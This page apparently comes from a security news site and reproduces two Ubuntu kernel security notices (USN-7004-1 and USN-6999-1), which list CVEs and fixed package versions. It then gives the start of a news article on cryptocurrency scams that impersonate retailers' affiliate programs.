Ubuntu Security Notice 7004-1 - Chenyuan Yang discovered that the CEC driver driver in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-7004-1September 12, 2024linux-azure vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure: Linux kernel for Microsoft Azure Cloud systemsDetails:Chenyuan Yang discovered that the CEC driver driver in the Linux kernelcontained a use-after-free vulnerability. A local attacker could use thisto cause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2024-23848)It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2024-40902)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - MIPS architecture;  - PA-RISC architecture;  - PowerPC architecture;  - RISC-V architecture;  - x86 architecture;  - Block layer subsystem;  - ACPI drivers;  - Drivers core;  - Null block device driver;  - Character device driver;  - TPM device driver;  - Clock framework and drivers;  - CPU frequency scaling framework;  - Hardware crypto device drivers;  - CXL (Compute Express Link) drivers;  - Buffer Sharing and Synchronization framework;  - DMA engine subsystem;  - EFI core;  - FPGA Framework;  - GPU drivers;  - Greybus drivers;  - HID subsystem;  - HW tracing;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - Input Device (Mouse) drivers;  - Mailbox framework;  - Media drivers;  - Microchip PCI driver;  - VMware VMCI Driver;  - Network drivers;  - PCI subsystem;  - x86 platform drivers;  - PTP clock framework;  - S/390 drivers;  - SCSI drivers;  - SoundWire subsystem;  - Sonic Silicon Backplane drivers;  - Greybus lights staging drivers;  - Thermal drivers;  - TTY drivers;  - USB subsystem;  - VFIO drivers;  - Framebuffer layer;  - Watchdog drivers;  - 9P distributed file system;  - BTRFS file system;  - File systems infrastructure;  - Ext4 file system;  - F2FS file system;  - JFS file system;  - Network file system server daemon;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - Tracing file system;  - IOMMU subsystem;  - Tracing infrastructure;  - io_uring subsystem;  - Core kernel;  - BPF subsystem;  - Kernel debugger infrastructure;  - DMA mapping infrastructure;  - IRQ subsystem;  - Memory management;  - 9P file system network protocol;  - Amateur Radio drivers;  - B.A.T.M.A.N. meshing protocol;  - Ethernet bridge;  - Networking core;  - Ethtool driver;  - IPv4 networking;  - IPv6 networking;  - MAC80211 subsystem;  - Multipath TCP;  - Netfilter;  - NET/ROM layer;  - NFC subsystem;  - Network traffic control;  - Sun RPC protocol;  - TIPC protocol;  - TLS protocol;  - Unix domain sockets;  - Wireless networking;  - XFRM subsystem;  - AppArmor security module;  - Integrity Measurement Architecture(IMA) framework;  - Landlock security;  - Linux Security Modules (LSM) Framework;  - SELinux security module;  - Simplified Mandatory Access Control Kernel framework;  - ALSA framework;  - HD-audio driver;  - SOF drivers;  - KVM core;(CVE-2024-36270, CVE-2024-38627, CVE-2024-39508, CVE-2024-41001,CVE-2024-38634, CVE-2024-40979, CVE-2024-40903, CVE-2024-34030,CVE-2024-38621, CVE-2024-34027, CVE-2024-39504, CVE-2024-38385,CVE-2024-36288, CVE-2024-39301, CVE-2024-38628, CVE-2024-42270,CVE-2024-39507, CVE-2024-36286, CVE-2024-40960, CVE-2024-36479,CVE-2024-41002, CVE-2024-36974, CVE-2024-40943, CVE-2024-40976,CVE-2024-38662, CVE-2024-40995, CVE-2024-39497, CVE-2024-31076,CVE-2024-39371, CVE-2024-40983, CVE-2024-40985, CVE-2024-38618,CVE-2024-40914, CVE-2024-40989, CVE-2024-40973, CVE-2024-38663,CVE-2024-39463, CVE-2024-38633, CVE-2024-36978, CVE-2024-40970,CVE-2024-40932, CVE-2024-39480, CVE-2024-39471, CVE-2024-40962,CVE-2024-40986, CVE-2024-40937, CVE-2024-39469, CVE-2024-40904,CVE-2024-39466, CVE-2024-38388, CVE-2024-39494, CVE-2024-41004,CVE-2024-38381, CVE-2022-48772, CVE-2024-33847, CVE-2024-40969,CVE-2024-40957, CVE-2024-40933, CVE-2024-37354, CVE-2024-39468,CVE-2024-40917, CVE-2024-38623, CVE-2024-40958, CVE-2024-39502,CVE-2024-38384, CVE-2024-39506, CVE-2024-40940, CVE-2024-34777,CVE-2024-41005, CVE-2024-39470, CVE-2024-39464, CVE-2024-39492,CVE-2024-38629, CVE-2024-39505, CVE-2024-40952, CVE-2024-40941,CVE-2024-39474, CVE-2024-38664, CVE-2024-40929, CVE-2024-39489,CVE-2024-40953, CVE-2024-40916, CVE-2024-40911, CVE-2024-32936,CVE-2024-40934, CVE-2024-37078, CVE-2024-39483, CVE-2024-40967,CVE-2024-40924, CVE-2024-39462, CVE-2024-40981, CVE-2024-36281,CVE-2024-39291, CVE-2024-39481, CVE-2024-40978, CVE-2024-38622,CVE-2024-39503, CVE-2024-40956, CVE-2023-52884, CVE-2024-39498,CVE-2024-38661, CVE-2024-40918, CVE-2024-39479, CVE-2024-40915,CVE-2024-39501, CVE-2024-39488, CVE-2024-40925, CVE-2024-40930,CVE-2024-40961, CVE-2024-40951, CVE-2024-38636, CVE-2024-39491,CVE-2024-39495, CVE-2024-39509, CVE-2024-40947, CVE-2024-36477,CVE-2024-36478, CVE-2024-42148, CVE-2024-39473, CVE-2024-39510,CVE-2024-40923, CVE-2024-38624, CVE-2024-38659, CVE-2024-36971,CVE-2024-38625, CVE-2024-40913, CVE-2024-35247, CVE-2024-36481,CVE-2024-36484, CVE-2024-40928, CVE-2024-40927, CVE-2024-40944,CVE-2024-39485, CVE-2024-36244, CVE-2024-40910, CVE-2024-40945,CVE-2024-33621, CVE-2024-38667, CVE-2024-40992, CVE-2024-40908,CVE-2024-40901, CVE-2024-40906, CVE-2024-38390, CVE-2024-40900,CVE-2024-41006, CVE-2024-40968, CVE-2024-40966, CVE-2024-40977,CVE-2024-33619, CVE-2024-39496, CVE-2024-38630, CVE-2024-40920,CVE-2024-39499, CVE-2024-40899, CVE-2024-41003, CVE-2024-40964,CVE-2024-40922, CVE-2024-38632, CVE-2024-40931, CVE-2024-40982,CVE-2024-40971, CVE-2024-39277, CVE-2024-39467, CVE-2024-36015,CVE-2024-40954, CVE-2024-40938, CVE-2024-40921, CVE-2024-39296,CVE-2024-41040, CVE-2024-40965, CVE-2024-39465, CVE-2024-40984,CVE-2024-39478, CVE-2024-40990, CVE-2024-40926, CVE-2024-40980,CVE-2024-40905, CVE-2024-39475, CVE-2024-40959, CVE-2024-40902,CVE-2024-38780, CVE-2024-40935, CVE-2024-37021, CVE-2024-40997,CVE-2024-40936, CVE-2024-40987, CVE-2024-40939, CVE-2024-37026,CVE-2024-36973, CVE-2024-40972, CVE-2024-42078, CVE-2024-38306,CVE-2024-40949, CVE-2024-36489, CVE-2024-38637, CVE-2024-40912,CVE-2024-39276, CVE-2024-39493, CVE-2024-40994, CVE-2024-40948,CVE-2024-36972, CVE-2024-40942, CVE-2024-37356, CVE-2024-38619,CVE-2024-40988, CVE-2024-38635, CVE-2024-41000, CVE-2024-40955,CVE-2024-40999, CVE-2024-40974, CVE-2024-39490, CVE-2024-39298,CVE-2024-40975, CVE-2024-40998, CVE-2024-40996, CVE-2024-40963,CVE-2024-40909, CVE-2024-40919, CVE-2024-39500, CVE-2024-39461)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  linux-image-6.8.0-1014-azure    6.8.0-1014.16  linux-image-6.8.0-1014-azure-fde  6.8.0-1014.16  linux-image-azure               6.8.0-1014.16  linux-image-azure-fde           6.8.0-1014.16After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7004-1  CVE-2022-48772, CVE-2023-52884, CVE-2024-23848, CVE-2024-31076,  CVE-2024-32936, CVE-2024-33619, CVE-2024-33621, CVE-2024-33847,  CVE-2024-34027, CVE-2024-34030, CVE-2024-34777, CVE-2024-35247,  CVE-2024-36015, CVE-2024-36244, CVE-2024-36270, CVE-2024-36281,  CVE-2024-36286, CVE-2024-36288, CVE-2024-36477, CVE-2024-36478,  CVE-2024-36479, CVE-2024-36481, CVE-2024-36484, CVE-2024-36489,  CVE-2024-36971, CVE-2024-36972, CVE-2024-36973, CVE-2024-36974,  CVE-2024-36978, CVE-2024-37021, CVE-2024-37026, CVE-2024-37078,  CVE-2024-37354, CVE-2024-37356, CVE-2024-38306, CVE-2024-38381,  CVE-2024-38384, CVE-2024-38385, CVE-2024-38388, CVE-2024-38390,  CVE-2024-38618, CVE-2024-38619, CVE-2024-38621, CVE-2024-38622,  CVE-2024-38623, CVE-2024-38624, CVE-2024-38625, CVE-2024-38627,  CVE-2024-38628, CVE-2024-38629, CVE-2024-38630, CVE-2024-38632,  CVE-2024-38633, CVE-2024-38634, CVE-2024-38635, CVE-2024-38636,  CVE-2024-38637, CVE-2024-38659, CVE-2024-38661, CVE-2024-38662,  CVE-2024-38663, CVE-2024-38664, CVE-2024-38667, CVE-2024-38780,  CVE-2024-39276, CVE-2024-39277, CVE-2024-39291, CVE-2024-39296,  CVE-2024-39298, CVE-2024-39301, CVE-2024-39371, CVE-2024-39461,  CVE-2024-39462, CVE-2024-39463, CVE-2024-39464, CVE-2024-39465,  CVE-2024-39466, CVE-2024-39467, CVE-2024-39468, CVE-2024-39469,  CVE-2024-39470, CVE-2024-39471, CVE-2024-39473, CVE-2024-39474,  CVE-2024-39475, CVE-2024-39478, CVE-2024-39479, CVE-2024-39480,  CVE-2024-39481, CVE-2024-39483, CVE-2024-39485, CVE-2024-39488,  CVE-2024-39489, CVE-2024-39490, CVE-2024-39491, CVE-2024-39492,  CVE-2024-39493, CVE-2024-39494, CVE-2024-39495, CVE-2024-39496,  CVE-2024-39497, CVE-2024-39498, CVE-2024-39499, CVE-2024-39500,  CVE-2024-39501, CVE-2024-39502, CVE-2024-39503, CVE-2024-39504,  CVE-2024-39505, CVE-2024-39506, CVE-2024-39507, CVE-2024-39508,  CVE-2024-39509, CVE-2024-39510, CVE-2024-40899, CVE-2024-40900,  CVE-2024-40901, CVE-2024-40902, CVE-2024-40903, CVE-2024-40904,  CVE-2024-40905, CVE-2024-40906, CVE-2024-40908, CVE-2024-40909,  CVE-2024-40910, CVE-2024-40911, CVE-2024-40912, CVE-2024-40913,  CVE-2024-40914, CVE-2024-40915, CVE-2024-40916, CVE-2024-40917,  CVE-2024-40918, CVE-2024-40919, CVE-2024-40920, CVE-2024-40921,  CVE-2024-40922, CVE-2024-40923, CVE-2024-40924, CVE-2024-40925,  CVE-2024-40926, CVE-2024-40927, CVE-2024-40928, CVE-2024-40929,  CVE-2024-40930, CVE-2024-40931, CVE-2024-40932, CVE-2024-40933,  CVE-2024-40934, CVE-2024-40935, CVE-2024-40936, CVE-2024-40937,  CVE-2024-40938, CVE-2024-40939, CVE-2024-40940, CVE-2024-40941,  CVE-2024-40942, CVE-2024-40943, CVE-2024-40944, CVE-2024-40945,  CVE-2024-40947, CVE-2024-40948, CVE-2024-40949, CVE-2024-40951,  CVE-2024-40952, CVE-2024-40953, CVE-2024-40954, CVE-2024-40955,  CVE-2024-40956, CVE-2024-40957, CVE-2024-40958, CVE-2024-40959,  CVE-2024-40960, CVE-2024-40961, CVE-2024-40962, CVE-2024-40963,  CVE-2024-40964, CVE-2024-40965, CVE-2024-40966, CVE-2024-40967,  CVE-2024-40968, CVE-2024-40969, CVE-2024-40970, CVE-2024-40971,  CVE-2024-40972, CVE-2024-40973, CVE-2024-40974, CVE-2024-40975,  CVE-2024-40976, CVE-2024-40977, CVE-2024-40978, CVE-2024-40979,  CVE-2024-40980, CVE-2024-40981, CVE-2024-40982, CVE-2024-40983,  CVE-2024-40984, CVE-2024-40985, CVE-2024-40986, CVE-2024-40987,  CVE-2024-40988, CVE-2024-40989, CVE-2024-40990, CVE-2024-40992,  CVE-2024-40994, CVE-2024-40995, CVE-2024-40996, CVE-2024-40997,  CVE-2024-40998, CVE-2024-40999, CVE-2024-41000, CVE-2024-41001,  CVE-2024-41002, CVE-2024-41003, CVE-2024-41004, CVE-2024-41005,  CVE-2024-41006, CVE-2024-41040, CVE-2024-42078, CVE-2024-42148,  CVE-2024-42270Package Information:  https://launchpad.net/ubuntu/+source/linux-azure/6.8.0-1014.16

Ubuntu Security Notice USN-7004-1

Ubuntu Security Notice 6999-1 - Chenyuan Yang discovered that the CEC driver driver in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that the JFS file system contained an out-of-bounds read vulnerability when printing xattr debug information. A local attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6999-1September 11, 2024linux, linux-aws, linux-gcp, linux-gke, linux-ibm, linux-lowlatency,linux-oem-6.8, linux-oracle vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-lowlatency: Linux low latency kernel- linux-oem-6.8: Linux kernel for OEM systems- linux-oracle: Linux kernel for Oracle Cloud systemsDetails:Chenyuan Yang discovered that the CEC driver driver in the Linux kernelcontained a use-after-free vulnerability. A local attacker could use thisto cause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2024-23848)It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2024-40902)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - MIPS architecture;  - PA-RISC architecture;  - PowerPC architecture;  - RISC-V architecture;  - x86 architecture;  - Block layer subsystem;  - ACPI drivers;  - Drivers core;  - Null block device driver;  - Character device driver;  - TPM device driver;  - Clock framework and drivers;  - CPU frequency scaling framework;  - Hardware crypto device drivers;  - CXL (Compute Express Link) drivers;  - Buffer Sharing and Synchronization framework;  - DMA engine subsystem;  - EFI core;  - FPGA Framework;  - GPU drivers;  - Greybus drivers;  - HID subsystem;  - HW tracing;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - Input Device (Mouse) drivers;  - Mailbox framework;  - Media drivers;  - Microchip PCI driver;  - VMware VMCI Driver;  - Network drivers;  - PCI subsystem;  - x86 platform drivers;  - PTP clock framework;  - S/390 drivers;  - SCSI drivers;  - SoundWire subsystem;  - Sonic Silicon Backplane drivers;  - Greybus lights staging drivers;  - Thermal drivers;  - TTY drivers;  - USB subsystem;  - VFIO drivers;  - Framebuffer layer;  - Watchdog drivers;  - 9P distributed file system;  - BTRFS file system;  - File systems infrastructure;  - Ext4 file system;  - F2FS file system;  - JFS file system;  - Network file system server daemon;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - Tracing file system;  - Tracing infrastructure;  - io_uring subsystem;  - Core kernel;  - BPF subsystem;  - Kernel debugger infrastructure;  - DMA mapping infrastructure;  - IRQ subsystem;  - Memory management;  - 9P file system network protocol;  - Amateur Radio drivers;  - B.A.T.M.A.N. meshing protocol;  - Ethernet bridge;  - Networking core;  - Ethtool driver;  - IPv4 networking;  - IPv6 networking;  - MAC80211 subsystem;  - Multipath TCP;  - Netfilter;  - NET/ROM layer;  - NFC subsystem;  - Network traffic control;  - Sun RPC protocol;  - TIPC protocol;  - TLS protocol;  - Unix domain sockets;  - Wireless networking;  - XFRM subsystem;  - AppArmor security module;  - Integrity Measurement Architecture(IMA) framework;  - Landlock security;  - Linux Security Modules (LSM) Framework;  - SELinux security module;  - Simplified Mandatory Access Control Kernel framework;  - ALSA framework;  - HD-audio driver;  - SOF drivers;  - KVM core;(CVE-2024-40911, CVE-2024-37356, CVE-2024-40935, CVE-2024-40944,CVE-2024-41003, CVE-2024-40990, CVE-2024-40952, CVE-2024-40940,CVE-2024-40930, CVE-2024-40985, CVE-2024-40941, CVE-2024-38630,CVE-2024-39466, CVE-2024-40933, CVE-2024-38624, CVE-2024-40924,CVE-2024-40945, CVE-2024-40899, CVE-2024-38622, CVE-2024-40979,CVE-2024-36484, CVE-2024-41004, CVE-2024-39474, CVE-2022-48772,CVE-2024-36244, CVE-2024-38664, CVE-2024-40925, CVE-2024-40980,CVE-2024-39480, CVE-2024-36270, CVE-2024-40936, CVE-2024-40904,CVE-2024-38635, CVE-2024-40927, CVE-2024-36481, CVE-2024-40929,CVE-2024-40958, CVE-2024-36978, CVE-2024-40992, CVE-2024-40908,CVE-2024-39504, CVE-2024-41001, CVE-2024-40967, CVE-2023-52884,CVE-2024-40997, CVE-2024-40903, CVE-2024-40913, CVE-2024-34030,CVE-2024-39473, CVE-2024-40966, CVE-2024-40951, CVE-2024-40902,CVE-2024-40982, CVE-2024-40923, CVE-2024-39467, CVE-2024-40910,CVE-2024-40909, CVE-2024-39463, CVE-2024-40974, CVE-2024-41002,CVE-2024-39464, CVE-2024-39496, CVE-2024-41040, CVE-2024-39469,CVE-2024-39500, CVE-2024-39510, CVE-2024-38627, CVE-2024-32936,CVE-2024-40975, CVE-2024-38390, CVE-2024-40959, CVE-2024-41006,CVE-2024-40986, CVE-2024-40987, CVE-2024-40922, CVE-2024-40983,CVE-2024-37354, CVE-2024-38637, CVE-2024-39277, CVE-2024-40943,CVE-2024-39371, CVE-2024-40921, CVE-2024-40953, CVE-2024-38634,CVE-2024-38659, CVE-2024-39492, CVE-2024-40976, CVE-2024-40906,CVE-2024-40965, CVE-2024-38667, CVE-2024-39498, CVE-2024-38628,CVE-2024-38661, CVE-2024-38663, CVE-2024-40998, CVE-2024-40948,CVE-2024-38306, CVE-2024-40928, CVE-2024-39468, CVE-2024-39494,CVE-2024-39505, CVE-2024-40963, CVE-2024-39499, CVE-2024-39506,CVE-2024-40995, CVE-2024-39491, CVE-2024-40900, CVE-2024-39478,CVE-2024-39490, CVE-2024-39291, CVE-2024-40981, CVE-2024-40926,CVE-2024-40939, CVE-2024-38385, CVE-2024-39483, CVE-2024-40989,CVE-2024-40955, CVE-2024-39501, CVE-2024-38381, CVE-2024-33621,CVE-2024-40964, CVE-2024-42148, CVE-2024-36286, CVE-2024-38629,CVE-2024-39509, CVE-2024-39298, CVE-2024-36489, CVE-2024-34777,CVE-2024-40957, CVE-2024-40919, CVE-2024-39462, CVE-2024-39495,CVE-2024-39497, CVE-2024-38636, CVE-2024-36281, CVE-2024-39479,CVE-2024-40932, CVE-2024-36288, CVE-2024-38623, CVE-2024-40969,CVE-2024-40931, CVE-2024-36971, CVE-2024-40934, CVE-2024-36015,CVE-2024-39485, CVE-2024-40996, CVE-2024-39507, CVE-2024-36973,CVE-2024-38625, CVE-2024-39301, CVE-2024-34027, CVE-2024-37026,CVE-2024-40960, CVE-2024-37078, CVE-2024-40912, CVE-2024-40988,CVE-2024-41005, CVE-2024-39276, CVE-2024-38662, CVE-2024-39502,CVE-2024-36479, CVE-2024-40947, CVE-2024-38780, CVE-2024-38388,CVE-2024-40917, CVE-2024-36974, CVE-2024-40970, CVE-2024-40901,CVE-2024-38384, CVE-2024-39475, CVE-2024-40949, CVE-2024-37021,CVE-2024-38633, CVE-2024-39503, CVE-2024-41000, CVE-2024-33847,CVE-2024-35247, CVE-2024-40968, CVE-2024-33619, CVE-2024-38619,CVE-2024-40984, CVE-2024-36478, CVE-2024-39493, CVE-2024-42078,CVE-2024-40954, CVE-2024-40978, CVE-2024-39508, CVE-2024-40915,CVE-2024-39489, CVE-2024-40920, CVE-2024-38618, CVE-2024-40938,CVE-2024-39296, CVE-2024-40962, CVE-2024-39470, CVE-2024-39481,CVE-2024-40977, CVE-2024-38621, CVE-2024-40971, CVE-2024-31076,CVE-2024-36972, CVE-2024-39471, CVE-2024-40994, CVE-2024-40973,CVE-2024-40916, CVE-2024-40942, CVE-2024-40956, CVE-2024-39465,CVE-2024-40914, CVE-2024-40937, CVE-2024-40918, CVE-2024-40905,CVE-2024-39488, CVE-2024-38632, CVE-2024-39461, CVE-2024-40999,CVE-2024-40972, CVE-2024-36477, CVE-2024-40961)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  linux-image-6.8.0-1010-gke      6.8.0-1010.13  linux-image-6.8.0-1012-ibm      6.8.0-1012.12  linux-image-6.8.0-1012-oem      6.8.0-1012.12  linux-image-6.8.0-1012-oracle   6.8.0-1012.12  linux-image-6.8.0-1012-oracle-64k  6.8.0-1012.12  linux-image-6.8.0-1014-gcp      6.8.0-1014.16  linux-image-6.8.0-1015-aws      6.8.0-1015.16  linux-image-6.8.0-44-generic    6.8.0-44.44  linux-image-6.8.0-44-generic-64k  6.8.0-44.44  linux-image-6.8.0-44-lowlatency  6.8.0-44.44.1  linux-image-6.8.0-44-lowlatency-64k  6.8.0-44.44.1  linux-image-aws                 6.8.0-1015.16  linux-image-gcp                 6.8.0-1014.16  linux-image-generic             6.8.0-44.44  linux-image-generic-64k         6.8.0-44.44  linux-image-generic-64k-hwe-24.04  6.8.0-44.44  linux-image-generic-hwe-24.04   6.8.0-44.44  linux-image-generic-lpae        6.8.0-44.44  linux-image-gke                 6.8.0-1010.13  linux-image-ibm                 6.8.0-1012.12  linux-image-ibm-classic         6.8.0-1012.12  linux-image-ibm-lts-24.04       6.8.0-1012.12  linux-image-kvm                 6.8.0-44.44  linux-image-lowlatency          6.8.0-44.44.1  linux-image-lowlatency-64k      6.8.0-44.44.1  linux-image-oracle              6.8.0-1012.12  linux-image-oracle-64k          6.8.0-1012.12  linux-image-virtual             6.8.0-44.44  linux-image-virtual-hwe-24.04   6.8.0-44.44After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-6999-1  CVE-2022-48772, CVE-2023-52884, CVE-2024-23848, CVE-2024-31076,  CVE-2024-32936, CVE-2024-33619, CVE-2024-33621, CVE-2024-33847,  CVE-2024-34027, CVE-2024-34030, CVE-2024-34777, CVE-2024-35247,  CVE-2024-36015, CVE-2024-36244, CVE-2024-36270, CVE-2024-36281,  CVE-2024-36286, CVE-2024-36288, CVE-2024-36477, CVE-2024-36478,  CVE-2024-36479, CVE-2024-36481, CVE-2024-36484, CVE-2024-36489,  CVE-2024-36971, CVE-2024-36972, CVE-2024-36973, CVE-2024-36974,  CVE-2024-36978, CVE-2024-37021, CVE-2024-37026, CVE-2024-37078,  CVE-2024-37354, CVE-2024-37356, CVE-2024-38306, CVE-2024-38381,  CVE-2024-38384, CVE-2024-38385, CVE-2024-38388, CVE-2024-38390,  CVE-2024-38618, CVE-2024-38619, CVE-2024-38621, CVE-2024-38622,  CVE-2024-38623, CVE-2024-38624, CVE-2024-38625, CVE-2024-38627,  CVE-2024-38628, CVE-2024-38629, CVE-2024-38630, CVE-2024-38632,  CVE-2024-38633, CVE-2024-38634, CVE-2024-38635, CVE-2024-38636,  CVE-2024-38637, CVE-2024-38659, CVE-2024-38661, CVE-2024-38662,  CVE-2024-38663, CVE-2024-38664, CVE-2024-38667, CVE-2024-38780,  CVE-2024-39276, CVE-2024-39277, CVE-2024-39291, CVE-2024-39296,  CVE-2024-39298, CVE-2024-39301, CVE-2024-39371, CVE-2024-39461,  CVE-2024-39462, CVE-2024-39463, CVE-2024-39464, CVE-2024-39465,  CVE-2024-39466, CVE-2024-39467, CVE-2024-39468, CVE-2024-39469,  CVE-2024-39470, CVE-2024-39471, CVE-2024-39473, CVE-2024-39474,  CVE-2024-39475, CVE-2024-39478, CVE-2024-39479, CVE-2024-39480,  CVE-2024-39481, CVE-2024-39483, CVE-2024-39485, CVE-2024-39488,  CVE-2024-39489, CVE-2024-39490, CVE-2024-39491, CVE-2024-39492,  CVE-2024-39493, CVE-2024-39494, CVE-2024-39495, CVE-2024-39496,  CVE-2024-39497, CVE-2024-39498, CVE-2024-39499, CVE-2024-39500,  CVE-2024-39501, CVE-2024-39502, CVE-2024-39503, CVE-2024-39504,  CVE-2024-39505, CVE-2024-39506, CVE-2024-39507, CVE-2024-39508,  CVE-2024-39509, CVE-2024-39510, CVE-2024-40899, CVE-2024-40900,  CVE-2024-40901, CVE-2024-40902, CVE-2024-40903, CVE-2024-40904,  CVE-2024-40905, CVE-2024-40906, CVE-2024-40908, CVE-2024-40909,  CVE-2024-40910, CVE-2024-40911, CVE-2024-40912, CVE-2024-40913,  CVE-2024-40914, CVE-2024-40915, CVE-2024-40916, CVE-2024-40917,  CVE-2024-40918, CVE-2024-40919, CVE-2024-40920, CVE-2024-40921,  CVE-2024-40922, CVE-2024-40923, CVE-2024-40924, CVE-2024-40925,  CVE-2024-40926, CVE-2024-40927, CVE-2024-40928, CVE-2024-40929,  CVE-2024-40930, CVE-2024-40931, CVE-2024-40932, CVE-2024-40933,  CVE-2024-40934, CVE-2024-40935, CVE-2024-40936, CVE-2024-40937,  CVE-2024-40938, CVE-2024-40939, CVE-2024-40940, CVE-2024-40941,  CVE-2024-40942, CVE-2024-40943, CVE-2024-40944, CVE-2024-40945,  CVE-2024-40947, CVE-2024-40948, CVE-2024-40949, CVE-2024-40951,  CVE-2024-40952, CVE-2024-40953, CVE-2024-40954, CVE-2024-40955,  CVE-2024-40956, CVE-2024-40957, CVE-2024-40958, CVE-2024-40959,  CVE-2024-40960, CVE-2024-40961, CVE-2024-40962, CVE-2024-40963,  CVE-2024-40964, CVE-2024-40965, CVE-2024-40966, CVE-2024-40967,  CVE-2024-40968, CVE-2024-40969, CVE-2024-40970, CVE-2024-40971,  CVE-2024-40972, CVE-2024-40973, CVE-2024-40974, CVE-2024-40975,  CVE-2024-40976, CVE-2024-40977, CVE-2024-40978, CVE-2024-40979,  CVE-2024-40980, CVE-2024-40981, CVE-2024-40982, CVE-2024-40983,  CVE-2024-40984, CVE-2024-40985, CVE-2024-40986, CVE-2024-40987,  CVE-2024-40988, CVE-2024-40989, CVE-2024-40990, CVE-2024-40992,  CVE-2024-40994, CVE-2024-40995, CVE-2024-40996, CVE-2024-40997,  CVE-2024-40998, CVE-2024-40999, CVE-2024-41000, CVE-2024-41001,  CVE-2024-41002, CVE-2024-41003, CVE-2024-41004, CVE-2024-41005,  CVE-2024-41006, CVE-2024-41040, CVE-2024-42078, CVE-2024-42148Package Information:  https://launchpad.net/ubuntu/+source/linux/6.8.0-44.44  https://launchpad.net/ubuntu/+source/linux-aws/6.8.0-1015.16  https://launchpad.net/ubuntu/+source/linux-gcp/6.8.0-1014.16  https://launchpad.net/ubuntu/+source/linux-gke/6.8.0-1010.13  https://launchpad.net/ubuntu/+source/linux-ibm/6.8.0-1012.12  https://launchpad.net/ubuntu/+source/linux-lowlatency/6.8.0-44.44.1  https://launchpad.net/ubuntu/+source/linux-oem-6.8/6.8.0-1012.12  https://launchpad.net/ubuntu/+source/linux-oracle/6.8.0-1012.12

Ubuntu Security Notice USN-6999-1

Cybercriminals are increasingly targeting retail affiliate programs with sophisticated cryptocurrency scams. Retailers and customers must stay alert against…

Cybercriminals are increasingly targeting retail affiliate programs with sophisticated cryptocurrency scams. Retailers and customers must stay alert against domain fraud, brand impersonation, and online Ponzi schemes to prevent losses.

Cybercriminals and nation-state hackers are increasingly targeting retail affiliate programs to conduct cryptocurrency scams, according to the latest research by cybersecurity firm DomainTools.

With its vast economic footprint and consumer brand loyalty, the retail sector has become a prime target for these malicious actors, exploiting online platforms and brand reputations to deceive consumers and reap financial rewards.

**Leveraging Brand Loyalty for Fraud**

The global retail industry—valued at over $30 trillion annually and with the top 50 retailers contributing more than $1.13 trillion in revenue in 2023—has always been a lucrative target for scammers and fraudsters. However, the transition toward e-commerce has opened up new opportunities for cybercriminals to exploit.

The DomainTools detailed technical report, shared with Hackread.com ahead of publishing, dives deep into how threat actors use domain fraud, brand impersonation, and multi-level Ponzi schemes to deceive consumers and steal cryptocurrency.

Cybercriminals are not just after financial gains; they are also damaging brand reputations. By closely imitating well-known consumer brands, these actors aim to exploit the trust and loyalty consumers have for these companies. This multi-layered fraud not only affects individual consumers but also threatens the credibility of the brands themselves.

**Online Storefronts: A Hotspot for Fraud**

One noteworthy trend underlined in the report is the rise of **e-commerce domain fraud**. As physical stores closed during the global pandemic, the retail sector’s move to online platforms created another ground for cybercriminals.

One group of threat actors, for instance, set up hundreds of fraudulent websites to impersonate well-known global retailers. These sites often promised huge discounts through fake “store closing” sales, luring unsuspecting consumers into the trap.

DomainTools traced thousands of such fraudulent domains, some of which impersonated luxury brands like Rolex and Cartier. The scammers created these fake websites using templates, automated processes, and even legitimate e-commerce platforms to generate convincing landing pages. The scale of the operation is staggering, with over 2,300 fraudulent domains tied to just one SSL certificate alone.

**Ponzi Schemes Disguised as Affiliate Programs**

The report also uncovers a disturbing trend: the use of brand impersonation to conduct financial fraud. Cybercriminals are preying on individuals looking for side-income opportunities by promising commissions for completing simple tasks, such as boosting online sales for well-known brands like Amazon and Target. Victims are led to believe they are joining legitimate affiliate programs when, in reality, they are being lured into Ponzi schemes.

